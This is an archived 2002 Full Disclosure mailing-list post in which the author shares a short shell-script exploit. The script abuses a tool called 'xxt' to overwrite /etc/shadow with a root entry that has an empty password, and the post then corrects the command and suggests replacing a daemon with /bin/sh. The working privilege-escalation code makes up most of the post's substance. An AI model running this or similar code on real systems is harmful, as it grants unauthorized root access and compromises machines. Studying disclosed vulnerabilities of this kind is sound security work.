Full Disclosure mailing list archives

Re: oops

From: full-disclosure () lists netsys com (zen-parse)
Date: Wed, 28 Aug 2002 02:12:24 +1200 (NZST)

On Wed, 28 Aug 2002, zen-parse wrote:

#!/bin/sh
echo root::11679:0:99999:7::: >inp
./xxt -i inp -k woot -e
./xxt -i inp -k woot -d -x -o /etc/shadow


oops
./xxt -i inp.xxt -k woot -d -x -o /etc/shadow

probably be better to overwrite some daemon with /bin/sh 
and connect,or something like that.



damn... see what happens in the rush for immediate full-disclosure?

better to do it responsibly, make sure you have the facts right,
and probably be better not to post the exploit to a public forum
straight away...

aliver: 

eventually i got it though.

your help page is wrong about either the -u option, or the example code 
too..

-- zen-parse
-- 
-------------------------------------------------------------------------
1) If this message was posted to a public forum by zen-parse () gmx net, it 
may be redistributed without modification. 
2) In any other case the contents of this message is confidential and not 
to be distributed in any form without express permission from the author.
This document may contain Unclassified Controlled Nuclear Information.

Current thread:

Oops Anthony LaMantia (Aug 12)
- <Possible follow-ups>
- oops zen-parse (Aug 27)
  - Re: oops zen-parse (Aug 27)
    - Re: oops full-disclosure () lists netsys com (Aug 27)
  - oops KF (Aug 27)
- Re: oops full-disclosure () lists netsys com (Aug 27)
  - Re: oops Charles Stevenson (Aug 27)
    - Re: oops full-disclosure () lists netsys com (Aug 27)
    - Re: oops full-disclosure () lists netsys com (Aug 27)
    - cran + vodka = unf KF (Aug 27)
    - cran + vodka = unf ATD (Aug 28)
    - Re: oops ATD (Aug 28)